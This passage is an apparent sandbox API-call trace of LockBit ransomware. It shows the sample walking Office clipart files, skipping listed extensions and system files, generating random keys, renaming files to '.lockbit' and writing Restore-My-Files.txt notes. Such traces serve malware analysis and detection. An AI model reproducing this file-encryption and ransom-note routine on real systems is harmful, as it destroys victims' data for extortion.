nFileSizeLow=0x6260, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00603_.WMF", cAlternateFileName="")) returned 1 [0175.574] lstrcmpiW (lpString1=".", lpString2="SO00603_.WMF") returned -1 [0175.574] lstrcmpiW (lpString1="..", lpString2="SO00603_.WMF") returned -1 [0175.574] PathFindExtensionW (pszPath="SO00603_.WMF") returned=".WMF" [0175.574] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.574] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.574] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.574] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.574] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.575] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.575] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00603_.WMF") returned -1 [0175.576] lstrcmpiW (lpString1="ntldr", lpString2="SO00603_.WMF") returned -1 [0175.576] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00603_.WMF") returned -1 [0175.576] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00603_.WMF") returned -1 [0175.576] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00603_.WMF") returned -1 [0175.576] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00603_.WMF") returned 1 [0175.576] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00603_.WMF") returned -1 [0175.576] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.576] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF") returned=".WMF" [0175.576] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.576] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.576] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.577] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.577] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF.lockbit") returned 72 [0175.577] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00603_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.578] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.578] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.578] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=25184) returned 1 [0175.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.580] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.580] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.586] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.586] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.587] free (_Block=0x1fa2ed8) [0175.587] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.587] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.587] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13335b00, ftCreationTime.dwHighDateTime=0x1bd4b0e, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x13335b00, ftLastWriteTime.dwHighDateTime=0x1bd4b0e, nFileSizeHigh=0x0, nFileSizeLow=0x9c80, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00610_.WMF", cAlternateFileName="")) returned 1 [0175.594] lstrcmpiW (lpString1=".", lpString2="SO00610_.WMF") returned -1 [0175.594] lstrcmpiW (lpString1="..", lpString2="SO00610_.WMF") returned -1 [0175.594] PathFindExtensionW (pszPath="SO00610_.WMF") returned=".WMF" [0175.594] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.594] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.595] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.595] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00610_.WMF") returned -1 [0175.596] lstrcmpiW (lpString1="ntldr", lpString2="SO00610_.WMF") returned -1 [0175.596] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00610_.WMF") returned -1 [0175.596] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00610_.WMF") returned -1 [0175.596] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00610_.WMF") returned -1 [0175.596] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00610_.WMF") returned 1 [0175.596] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00610_.WMF") returned -1 [0175.596] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.596] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF") returned=".WMF" [0175.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.596] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.596] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.597] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.597] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF.lockbit") returned 72 [0175.597] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00610_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.598] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.598] malloc (_Size=0x40068) returned 0x3df0008 [0175.599] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=40064) returned 1 [0175.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.600] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.602] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.602] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.602] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.603] free (_Block=0x1fa2ed8) [0175.603] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.603] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.603] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.604] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8d0400, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8d0400, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0xfe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00629_.WMF", cAlternateFileName="")) returned 1 [0175.604] lstrcmpiW (lpString1=".", lpString2="SO00629_.WMF") returned -1 [0175.604] lstrcmpiW (lpString1="..", lpString2="SO00629_.WMF") returned -1 [0175.604] PathFindExtensionW (pszPath="SO00629_.WMF") returned=".WMF" [0175.604] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.604] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.605] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.605] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.606] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00629_.WMF") returned -1 [0175.606] lstrcmpiW (lpString1="ntldr", lpString2="SO00629_.WMF") returned -1 [0175.606] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00629_.WMF") returned -1 [0175.606] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00629_.WMF") returned -1 [0175.606] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00629_.WMF") returned -1 [0175.606] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00629_.WMF") returned 1 [0175.606] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00629_.WMF") returned -1 [0175.607] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.607] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00629_.WMF") returned=".WMF" [0175.607] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.607] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.607] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.608] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.608] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.608] lstrcmpiW 